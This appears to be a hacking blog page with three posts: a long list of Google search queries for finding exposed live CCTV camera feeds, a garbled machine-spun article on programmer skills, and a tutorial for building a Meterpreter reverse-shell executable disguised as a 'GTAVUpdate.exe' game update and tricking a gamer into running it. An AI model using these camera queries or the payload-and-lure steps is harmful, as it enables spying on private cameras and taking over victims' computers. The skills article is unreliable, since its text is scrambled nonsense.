Breaking

Showing posts with label ARTICLES. Show all posts
Showing posts with label ARTICLES. Show all posts

Wednesday, September 30, 2020

September 30, 2020

Google Hacking/Dorking Explanation By Sajawal Hacker

Google hacking is a passive information gathering/footprinting technique that is used to discover vulnerabilities, data exposure and security mis-configurations in websites.
It involves using specialized search query operators to finetune results based on what you are looking for.




SPYING CCTV CAMERAS THROUGH GOOGLE:

  • Google Dorks one of most easy, fun, and powerful hacking techniques, online.

  • On the Internet, Websites are not only to be hacked, Websites are just part of the Internet.
  • There are many other products like Refrigerator, CCTV Cameras, Automated Doors, Televisions, Power Plants, etc. that are connected to the Internet, and some of them could be accessed through google.
So, right now we will be discussing CCTV Cameras.

👉Following are some Google Keyword Searches that you can simply type in into Google Search Box and find a CCTV live! 

  • inurl:”CgiStart?page=”
  • inurl:/view.shtml
  • intitle:”Live View / – AXIS
  • inurl:view/view.shtml
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg
  • inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
  • inurl:view/indexFrame.shtml
  • inurl:view/index.shtml
  • inurl:view/view.shtml
  • liveapplet
  • intitle:”live view” intitle:axis
  • intitle:liveapplet
  • allintitle:”Network Camera NetworkCamera” (disconnected)
  • intitle:axis intitle:”video server”
  • intitle:liveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View / – AXIS”
  • intitle:”Live View / – AXIS 206M”
  • intitle:”Live View / – AXIS 206W”
  • intitle:”Live View / – AXIS 210?
  • inurl:indexFrame.shtml Axis
  • inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
  • intitle:start inurl:cgistart
  • intitle:”WJ-NT104 Main Page”
  • intitle:snc-z20 inurl:home/
  • intitle:snc-cs3 inurl:home/
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1?
  • intitle:”sony network camera snc-m1?
  • site:.viewnetcam.com -www.viewnetcam.com
  • intitle:”Toshiba Network Camera” user login
  • intitle:”netcam live image” (disconnected)
  • intitle:”i-Catcher Console – Web Monitor”

Enter any of these searches in Google Search Box.


Axis: 
  • inurl:"view/indexFrame.shtml" 
  • inurl:"view/index.shtml" 
  • intitle:"Live View / - AXIS" 
  • intitle:axis camera 
  • intitle:"axis #Kameramodell#" 
Canon:
  • inurl:sample/LvAppl/ 
JVC: 
  • intitle:"V.Networks [Motion Picture(Java)" 
EvoCam: 
  • intitle:"EvoCam" 
  • inurl:"webcam.html" 
WebcamXP: 
  • intitle:"my webcamXP server!" 

MOBOTIX: 
  • inurl:/control/userimage.html 
Panasonic: 
  • inurl:/ViewerFrame?Mode=Motion 

FlexWatch: 
  • inurl:toolam.html 
  • inurl:viewash.html 
 
Toshiba: 
  • intitle:"TOSHIBA Network Camera - User Login" 
 
Sony: 
  • inurl:/home/homeJ.html 

And Some Others: 
  • inurl:/view.shtml 
  • intitle:”Live View / - AXIS” | inurl:view/view.shtml^ 
  • inurl:ViewerFrame?Mode= 
  • inurl:ViewerFrame?Mode=Refresh 
  • inurl:axis-cgi/jpg 
  • inurl:axis-cgi/mjpg (motion-JPEG) 
  • inurl:view/indexFrame.shtml 
  • inurl:view/index.shtml 
  • inurl:view/view.shtml 

liveapplet :
  • intitle:”live view” intitle:axis 
  • intitle:liveapplet 
  • allintitle:”Network Camera NetworkCamera” 
  • intitle:axis intitle:”video server” 
  • intitle:liveapplet inurl:LvAppl 
  • intitle:”EvoCam” inurl:”webcam.html” 
  • intitle:”Live NetSnap Cam-Server feed” 
  • intitle:”Live View / - AXIS” 
  • intitle:”Live View / - AXIS 206M” 
  • intitle:”Live View / - AXIS 206W” 
  • intitle:”Toshiba Network Camera” user login 
  • intitle:”netcam live image” 
  • intitle:”i-Catcher Console - Web Monitor” 
  • intitle:start inurl:cgistart 
  • intitle:”WJ-NT104 Main Page” 
  • intext:”MOBOTIX M1? intext:”Open Menu” 
  • intext:”MOBOTIX M10? intext:”Open Menu” 
  • intext:”MOBOTIX D10? intext:”Open Menu” 
  • intitle:snc-z20 inurl:home/ 
  • intitle:snc-cs3 inurl:home/ 
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1? 
  • intitle:”sony network camera snc-m1? 


Share To Your Friends And Learn Together With Us

⚠️Nᴏᴛᴇ:- Tʜɪs ᴀʟʟ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴘʀᴏᴠɪᴅᴇᴅ ʙʏ ᴜs ɪs ᴏɴʟʏ ғᴏʀ ᴍᴀᴋᴇ ʏᴏᴜ ᴍᴏʀᴇ ᴀᴡᴀʀᴇ ᴀɴᴅ sᴇᴄᴜʀᴇ ғʀᴏᴍ ᴛʜɪs ᴛʏᴘᴇ ᴏғ ʜᴀᴄᴋɪɴɢ ᴏʀ ᴄʀᴀᴄᴋɪɴɢ ᴀɴᴅ ɪғ ʏᴏᴜ ᴜsᴇ ɪᴛ ɪɴ ɪʟʟᴇɢᴀʟ ᴘᴜʀᴘᴏsᴇ ᴛʜᴇɴ ᴡᴇ ᴀʀᴇ ɴᴏᴛ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ᴛʜᴀᴛ !


➖➖➖➖➖➖➖➖➖➖➖➖


👍ʜᴏᴘᴇ ʏᴏᴜ ɢᴜʏs ʟɪᴋᴇ ᴛʜɪs ᴘᴏsᴛ.


"please give your feedback in comment"

Sunday, September 27, 2020

September 27, 2020

Top Skills To Become A Programmer (That You Didn't Know)

Skills To Become A Programmer (That You Didn't Know)



 Hi tech keep up here and welcome down to another article ah that is extraordinary in light of flow conditions I'm drinking around three cups of minute coffee reliably and you may think well that is genuinely appalling anyway it's not so much in such a case, that you check the fixings it's essentially coffee minute coffees you understand I can basically drink a ton of this an unrivaled request you may contemplate is in light of flow conditions conceivably I ought to just place assets into a run of the mill coffee machine given that I'm drinking so much coffee reliably and you might be right but it just takes altogether more work to make coffee doesn't it well I figured I would go over for all of you today our five must know aptitudes for programming originators and this may be especially profitable for schools understudies people who are essentially getting into tech endeavoring to advance toward getting to be programming designers and people who aren't generally aware of various capacities that may be required or required for the field you know we all in all understand the obvious ones right like you need to acknowledge how to program you need to get acquainted with a language and maybe you need some social capacities do some basic reasoning whiteboarding figurings data structures is that it and it might be truly for you to pass a particular gathering or something yet after some time and it may even help you look better in the event that you by one way or another figured out how to learn five additional aptitudes and these are capacities that as I would see it every single item modeler should know they're not so much clear but instead as time goes on you comprehend that every single item pro put aside the push to pick up capability with these things the first is typical enunciations incredibly I find that a huge amount of school understudies they're less capable about standard explanations unlike me I'm like an ace at common verbalizations I use them all the time I've collected entire databases out of ordinary enunciations when I might not want to use a standard like continuation database and standard explanations can accomplish so much it's a way to deal with do model planning on substance the most apparent use is for filtering colossal code bases for explicit pieces compositions using contraptions like grep you know many code editors support this like great Visual Studio code standard explanations or rejects is are as often as possible used for looking across over immense code bases doing look and replaces refactoring code they can even be used as code checks to limit presenting certain strings of substance certain styles of coding using ordinary explanations you can scratch destinations parse poor data make entire web applications where you read and data affirm the customer data store the data in a particular course of action and after that read that association back you can do most of that with standard explanations you don't require a database every single association I've worked in has depended seriously on standard verbalizations on the off chance that you're interested about them I endorse you have a gallon burden up continuing forward the second mastery that most architects should know is turn off a huge amount of specialists affront especially in case they're junior they don't for the most part know turn off yet at last various architects hold up continue to acknowledge turn off what is likewise noteworthy you understand turn off is a database language is for addressing database tables making tables changing them getting them and you may think yourself well you're not a database engineer what do you need turn off for turns out data estimations are huge for any pro to dispatch any component you ought to in all likelihood take a gander at the data analyze it logging is huge to check the impact that you have you understand you don't just vehicle a segment you send the component and a short time later you need to state well it extended over our application use time by two percent it dropped some other estimation by one percent yet I recover that in some other way and branch off is basic for having the choice to scrutinize your data logging estimations dashboards and have the alternative to understand what data is there these days in numerous associations to dispatch any component you need the estimations the data to back that up thus as to get those estimations you need turn off that is the reason it will be valuable for any planner to at any rate have the choice to make a couple out of standard side project request using like assembling according to popular demand by amassing things like that the third bent that we all in all need is researching inclination in all respects consistently I see builds if they understand how to code yet they don't have the foggiest thought how to investigate and they don't give much thought to it they basically state you understand the compilers wrong I don't understand they can't understand where bugs are there's essentially no basic speculation limit there in spite of the way that they know a couple of computations and investigating is amazingly the art of basic reasoning having the choice to quickly perceive where in the code a bug may be because for the vast majority of creators most of your endeavor will incorporate fixing little bugs.


You know there's a bug understand where it is and after that fix that bug and normally these bugs can be dull kind of exceptional hard to discover the ability to investigate will be noteworthy here and that I would state just as on the off chance that you're tackling state flexible applications for example you're going to need the choice to use the debugger gdb adventure through the program make breakpoints maybe see source control take a gander at the structures history of a report and see where it changed at what variation and where the issue may have first jumped up when in doubt individuals believe me to be a senior pro mentioned that I go fix a particular issue that no one else can fix it's not so much in light of the way that I understand some estimation better than anything some other individual is basically in light of the way that I understand how to research a program even more accurately and precisely it's incredibly about deliberate and basic reasoning aptitudes my fourth tip for you and this is what segregates the truly uncommon programming engineers from the reasonable ones is scripting tooling having the alternative to cause gadgets for yourself and you to acknowledge I have heard an announcement starting late that said most of the best programming specialists are making their own special instruments in the event that you're not auditing your own one of a kind contraptions to speed your very own strategy your own work procedure you're essentially going to be limited at this point the tooling that has recently given you understand I think what genuinely makes programming engineers significantly useful the complexity between a planner who is yielding 1x code versus 2x code or 5x or 10x code is the tooling and generally these gadgets will be written in a language like say Python conceivably PHP pummel you can even use like nodejs JavaScript potentially Ruby on Rails or go Path some tooling language that can we on the request way and you understand these substance can be used to help accelerate your general work process for example for Cobra factors you may create a substance there's only a one time use thing and it can analyze a store of code and revoke distinguish unused records may be surrey lines of code I most definitely make my own one of a kind substance wrappers over interpretation control so I'm not so much using like say git or unpredictable for adjustment control I'm using my own one of a kind system and I find that that for me is that my own work procedure so I would basically endorse that you're not dismiss the substance inside this will incorporate maybe having some acknowledgment with hammer Linux UNIX and a language like say Python or something like that for the fifth last and last tip I could have picked a huge amount of things anyway I trust I'm going to need to go with pulled back capacities and their social aptitudes are huge for an architect you know whether you basically go to your partner James and you state hi James how's it going are you feeling okay amigo might you want to go grab a lively mix would I have the option to liven you up sidekick did you have a decent part of the bargain most of that isn't commonly giving much an impetus to anybody and James may even diminish your welcome to go out in light of the fact that he's a clamoring individual everyone's endeavoring to be beneficial on association time accordingly the standard social mastery isn't commonly profitable yet you need a sort of social skill correspondence is as yet critical your standoffish capacities is amazingly about correspondence without being social and this may incorporate forming messages making wiki pages exhibiting on get-togethers setting in PowerPoint presentations making Exceed expectations sheets and notes and properly orbiting them it was entertaining that I've worked in specific associations where I may send a private message to somebody and that individual would explicitly rot to pass on back with me since they would express that this private educating does not surface the exchange for some other individual to see that sort of socialization is truly opposed and what people really need is a way to deal with defend history spare the learning and stream it with whatever number people as could be normal the situation being what it is the most ideal dialog for that may take after a wiki or an expansive email message or something like that where various people can see the at the discourse you understand this may in like manner incorporate in case you have a one-on-one talk with somebody well sure better trust it that is so sure yet after that you have to get that talk in a foe of social manner by which you record the notes of the get-together the talks and after that you course that over your gathering so everybody appreciates what was discussed that so for those of you who are not friendly individuals I would breathe easy in light of understanding that I don't accept anyone's really mentioning that you be an outgoing person there's extremely a whole other game plan of socialization social capacities that are required that are required for programming engineers that truly have more to do with being the singular yet bestowing enough on the off chance that you're scanning for more tips for programming experts try to similarly assessment step by step coding issue comm cut tech lead for step by step meeting coding issues they'll send you a free coding request question every day just to help keep your capacity sharp and if you sign up as M copyist they'll also send you the game plan so take a gander at them step by step coding issue.

Wednesday, September 23, 2020

September 23, 2020

Hack Windows 10 with Metasploit

ACADEMIC WORK

In this tutorial I’ll show you how to hack Windows 10 with Metasploit Framework. Kali Linux already comes with Metasploit, so no need to install.

By the end of this tutorial you should be able to gain basically full access to the victim machine (non persistence).


Requirements

  • Kali Linux with internet access
  • Windows 10 x64 with internet access

Both machines should be bridged to this work. This tutorial is for educational purposes and is local.

Windows 10 needs to have the Windows Defender Firewall disabled. In this tutorial we will not cover Shellter to make the .exe FUD (Fully Undetectable) that’s why we need to disabled it.


Create metasploit

Before creating the metasploit, we need to figure out what is our Kali Linux local IP.

For that, run ```ip addr``` or ```ifconfig```

Image for post
Get the IPv4 Local IP

Now let’s get hands dirty!

In the terminal run the follow command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
Image for post

The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.


Connection

We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

Image for post

The screenshot below shows what commands to issue within Metasploit. First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command ```use multi/handler```. We will then set the payload to match the one set within the executable using the command ```set payload windows/meterpreter/reverse_tcp```. We will then set the LHOST and LPORT this way — ```set LHOST 192.168.195.72``` and set ```LPORT 4444```. Once done, type ```run``` or ```exploit```and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.

Image for post

You can use show options to check if everything’s ok

Image for post

If everything’s ok type run or exploit

Image for post

Social Engineer

Now it’s the part that you need to do some social engineer in order to make the user execute the program.

For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows Machine.

Image for post

On the Windows machine you just need to access via the browser the IP/File.exe

In our case is 192.168.192.72/GTAVUpdate.exe

Image for post
Image for post

Now execute and check the connection on the Kali Machine.

Image for post

As you can see we are now connected to the victim machine.

Now we can do a lot of things.

Image for post
Image for post

How to Protect

For this type of attacks the most important thing is to have the Firewall enabled. Windows Defender makes a good job protecting files like this.

Dont’ forget to keep your Windows always updated and also don’t execute programs that you don’t know for sure that are original and signed.

Hope you enjoyed. :)

Share To Your Friends And Learn Together With Us

⚠️Nᴏᴛᴇ:- Tʜɪs ᴀʟʟ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴘʀᴏᴠɪᴅᴇᴅ ʙʏ ᴜs ɪs ᴏɴʟʏ ғᴏʀ ᴍᴀᴋᴇ ʏᴏᴜ ᴍᴏʀᴇ ᴀᴡᴀʀᴇ ᴀɴᴅ sᴇᴄᴜʀᴇ ғʀᴏᴍ ᴛʜɪs ᴛʏᴘᴇ ᴏғ ʜᴀᴄᴋɪɴɢ ᴏʀ ᴄʀᴀᴄᴋɪɴɢ ᴀɴᴅ ɪғ ʏᴏᴜ ᴜsᴇ ɪᴛ ɪɴ ɪʟʟᴇɢᴀʟ ᴘᴜʀᴘᴏsᴇ ᴛʜᴇɴ ᴡᴇ ᴀʀᴇ ɴᴏᴛ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ᴛʜᴀᴛ !


➖➖➖➖➖➖➖➖➖➖➖➖


👍ʜᴏᴘᴇ ʏᴏᴜ ɢᴜʏs ʟɪᴋᴇ ᴛʜɪs ᴘᴏsᴛ.


"please give your feedback in comment"